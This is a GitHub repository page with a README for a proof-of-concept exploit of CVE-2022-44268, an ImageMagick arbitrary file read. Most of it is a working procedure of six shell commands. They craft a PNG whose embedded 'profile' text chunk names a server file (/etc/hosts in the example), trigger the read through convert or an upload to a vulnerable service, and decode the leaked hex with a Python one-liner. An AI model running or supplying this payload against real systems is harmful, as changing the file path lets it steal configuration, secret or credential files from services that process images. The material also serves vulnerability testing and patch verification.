Skip to content

Ridter/CVE-2022-44268-ImageMagick-Arbitrary-File-Read-PoC

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits
 
 

Repository files navigation

CVE-2022-44268 ImageMagick Arbitrary File Read PoC

PoC for CVE-2022-44268 ImageMagick Arbitrary File Read PoC - Payload generator

This project is created only for educational purposes and cannot be used for law violation or personal gain.

The author of this project is not responsible for any possible harm caused by the materials of this project.

Usage:

Installing dependencies:

1. $ apt-get install pngcrush imagemagick exiftool exiv2 -y

Change the filename you want to read below:

2. $ pngcrush -text a "profile" "/etc/hosts" vjp.png

Confirm everything worked perfectly

3. $ exiv2 -pS pngout.png

Trigger the PoC via convert or upload image to the vulnerable service:

4. $ convert pngout.png gopro.png

View content of file was read:

5. $ identify -verbose gopro.png

Decrypt the content:

6. $ python3 -c 'print(bytes.fromhex("23202f6574632f686f7374730a3132372e302e302e31096c6f63616c686f73740a0a232054686520666f6c6c6f77696e67206c696e65732061726520646573697261626c6520666f7220495076362063617061626c6520686f7374730a3a3a3109096c6f63616c686f7374206970362d6c6f63616c686f7374206970362d6c6f6f706261636b0a666630323a3a3109096970362d616c6c6e6f6465730a666630323a3a3209096970362d616c6c726f75746572730a6475636e740a").decode("utf-8"))'

Demo

Tested with Ubuntu 22.04 and default imagemagick installed.

About

CVE-2022-44268 ImageMagick Arbitrary File Read - Payload Generator

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published